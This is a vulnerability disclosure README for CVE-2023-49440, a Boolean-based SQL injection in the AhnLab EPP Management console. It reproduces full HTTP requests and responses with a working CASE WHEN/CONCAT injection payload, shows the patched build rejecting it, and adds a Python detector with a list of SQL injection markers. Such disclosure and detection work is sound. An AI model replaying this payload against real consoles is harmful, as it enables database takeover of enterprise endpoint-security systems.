POC details: 5c019837c21de4fc0ada97ee94a6d92867937924

Source
Related vulnerability
Title: AhnLab EPP security vulnerability (CVE-2023-49440)
Description: AhnLab EPP is an endpoint security platform from the Korean company AhnLab. AhnLab EPP 1.0.15 contains a security vulnerability caused by improper handling of the preview parameter, which can lead to SQL injection.
Introduction
# CVE-2023-49440-POC

Exploit Title: ***AhnLab EPP Management (Centralised Endpoint Security Management) - Boolean-based SQL Injection leading to RCE***

Date: 16 July 2023

Exploit Author: KernelCipher

CVE : CVE-2023-49440

Vendor Homepage: https://www.ahnlab.com/en

Software Link: https://www.ahnlab.com/ko/product/epp-management

Product Review: https://www.gartner.com/reviews/market/endpoint-protection-platforms/compare/product/ahnlab-edr-vs-ahnlab-epp

Reference Link: https://cve.report/CVE-2023-49440

Vulnerable Version: 1.0.15 and before

Fixed Version: releases after 1.0.15 (2023)

***Vulnerability and Product Description***:

AhnLab EPP Management is a next-generation endpoint protection platform that integrates patch management, advanced malware detection, EDR and XDR capabilities to provide centralised management, real-time monitoring and policy control across enterprise endpoints. A Boolean-based and time-based SQL injection was discovered in the web admin interface of AhnLab EPP Management v1.0.15. It allowed full compromise of the backend database with administrative privileges and limited remote code execution (RCE). Several endpoints were affected. The one reproduced below is the `preview_query_report` action of `/api/console/ems/query/report/preview`: the second element of the `params` array in the JSON body reaches the database query unsanitised, so a `CASE WHEN` expression wrapped in `CONCAT` is evaluated by the database and its result is reflected in the `report` field of the response, which gives the Boolean oracle. All affected endpoints were patched in releases after v1.0.15, with fixes applied in 2023.

***This is a proof of reproduction for a Boolean-based SQL injection in AhnLab EPP Management. However, I will not release the Python PoC for security reasons until next year, and the affected version was patched over two years ago.***

### Request
```
POST /api/console/ems/query/report/preview HTTP/1.1
Host: 192.168.100.199:8803
Cookie: lang_set=en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: application/json; charset=utf-8
Accept-Language: en-GER;q=0.8,en-US;q=0.5,vi;q=0.3
Accept-Encoding: gzip, deflate
Authorization: bearer <Token>
Content-Type: application/json; charset=utf-8
Content-Length: 180
Origin: https://192.168.100.199:8803
Referer: https://192.168.100.199:8803/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

{
  "request": {
    "action": "preview_query_report",
    "revision": 1,
    "params": [
      "RDB",
      "(SELECT CONCAT(CONCAT(abc, (CASE WHEN (1337=1337) THEN '1' ELSE '0' END)), def))"
    ]
  },
  "data": []
}
```

### Response

```
HTTP/1.1 200
strict-transport-security: max-age=0
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
content-type: application/json; charset=utf-8
content-length: 135
date: 21 May 2023 11:48:00 GMT
cache-control: no-cache, no-store, no-control
connection: close

{
  "error_code": "EPP-00000",
  "error_msg": "success",
  "revision": 1,
  "response": [
    {
      "report": "[{\"concat\":\"abcdef\"}]",
      "item_order": 1
    }
  ]
}

```

### Fixed Version

In the patched build the same payload is no longer executed: the request is rejected with error code `SWU-00027` ("Conceal key expired") and an empty `response` array, as the capture below shows.

### Request

```
POST /api/console/ems/query/report/preview HTTP/1.1
Host: 192.168.100.199:8803
Cookie: lang_set=en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: application/json;charset=utf-8
Accept-Language: en,vi-GER;q=0.8,en-US;q=0.5,vi;q=0.3
Accept-Encoding: gzip, deflate, br
Authorization: bearer <Token>
Content-Type: application/json;charset=utf-8
Content-Length: 241
Origin: https://192.168.100.199:8803
Referer: https://192.168.100.199:8803/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

{
  "request": {
    "action": "preview_query_report",
    "revision": "1",
    "params": [
      "RDB",
      "1",
      "(SELECT CONCAT(CONCAT('abc', (CASE WHEN (1337=1337) THEN '1' ELSE '0' END)), 'def'))"
    ]
  },
  "data": {
    "extract_key": "<Key>="
  }
}

```
### Response
```

HTTP/1.1 200
strict-transport-security: max-age=0
x-frame-options: DENY
x-content-type-options: nosniff
content-type: application/json;charset=utf-8
content-length: 181
date: 16 Sept 2023 10:28:10 GMT
cache-control: no-cache,no-store,no-control
connection: close

{
  "error_code": "SWU-00027",
  "error_msg": "[SWU-00027] Conceal key expired. : \"\\\"extract_key\\\":\\\"<Key>=\\\"\"",
  "revision": 1,
  "response": [
  ]
}

```
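As an added example (not the author's withheld PoC and not the vendor's code), the following Python script shows how a defender could spot this injection in captured traffic: it parses the JSON body of `preview_query_report` requests to `/api/console/ems/query/report/preview`, flags `params` entries that contain SQL constructs, and uses the paired response to distinguish a payload the database executed (error code `EPP-00000` with a populated `response`) from one the patched build rejected (`SWU-00027`). The marker list, function names and sample captures are constructed for this example and are modelled on the exchanges above.

```python
"""Flag SQL-injection attempts against the EPP report-preview endpoint.

Added example for this write-up: not the author's withheld PoC and not AhnLab
code. It works on captured request/response bodies (e.g. from a reverse proxy
or WAF log). Field names follow the captures on the page; the marker list,
function names and sample captures below are constructed for this example.
"""
import json
import re

PREVIEW_PATH = "/api/console/ems/query/report/preview"

# SQL constructs that have no business in a report identifier. Word boundaries
# keep identifiers such as "selection" or "concatenated" from matching.
SQL_MARKERS = re.compile(
    r"\b(select|union|case\s+when|concat|sleep|benchmark|pg_sleep|waitfor)\b"
    r"|--|/\*|;",
    re.IGNORECASE,
)


def suspicious_params(request_body: str) -> list[str]:
    """Return params[] entries of a preview_query_report request that contain SQL.

    Non-JSON bodies, other actions and plain identifiers all yield [], so a
    non-empty result is the alerting condition.
    """
    try:
        doc = json.loads(request_body)
    except json.JSONDecodeError:
        return []
    req = doc.get("request") if isinstance(doc, dict) else None
    if not isinstance(req, dict) or req.get("action") != "preview_query_report":
        return []
    params = req.get("params") or []
    return [p for p in params if isinstance(p, str) and SQL_MARKERS.search(p)]


def assess_exchange(path: str, request_body: str, response_body: str) -> str:
    """Classify one request/response pair.

    "injection_executed": the server answered EPP-00000 with a populated
        response, i.e. the database evaluated the attacker's expression.
    "injection_blocked": any other parseable answer to a suspicious request
        (the patched build returns SWU-00027 with an empty response array).
    """
    if path != PREVIEW_PATH:
        return "other_endpoint"
    if not suspicious_params(request_body):
        return "benign"
    try:
        resp = json.loads(response_body)
    except json.JSONDecodeError:
        return "injection_attempt_unknown_outcome"
    if resp.get("error_code") == "EPP-00000" and resp.get("response"):
        return "injection_executed"
    return "injection_blocked"


# Constructed sample captures modelled on the exchanges shown above.
PAYLOAD = ("(SELECT CONCAT(CONCAT('abc', (CASE WHEN (1337=1337) THEN '1' "
           "ELSE '0' END)), 'def'))")
VULN_REQUEST = json.dumps({
    "request": {"action": "preview_query_report", "revision": 1,
                "params": ["RDB", PAYLOAD]},
    "data": [],
})
BENIGN_REQUEST = json.dumps({
    "request": {"action": "preview_query_report", "revision": 1,
                "params": ["RDB", "1"]},
    "data": [],
})
EXECUTED_RESPONSE = json.dumps({
    "error_code": "EPP-00000", "error_msg": "success", "revision": 1,
    "response": [{"report": "[{\"concat\":\"abcdef\"}]", "item_order": 1}],
})
BLOCKED_RESPONSE = json.dumps({
    "error_code": "SWU-00027", "error_msg": "[SWU-00027] Conceal key expired.",
    "revision": 1, "response": [],
})

if __name__ == "__main__":
    for label, req, resp in [("vulnerable build", VULN_REQUEST, EXECUTED_RESPONSE),
                             ("patched build", VULN_REQUEST, BLOCKED_RESPONSE),
                             ("normal use", BENIGN_REQUEST, EXECUTED_RESPONSE)]:
        print(f"{label:16s} -> {assess_exchange(PREVIEW_PATH, req, resp)}")
```

Fed the console's proxy or WAF log, `injection_executed` on a host still running 1.0.15 should be treated as a confirmed database compromise rather than a mere attempt, while `injection_blocked` on a patched host is evidence that the fix is in place.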
File snapshot

[4.0K] /data/pocs/5c019837c21de4fc0ada97ee94a6d92867937924
└── [4.2K] README.md
0 directories, 1 file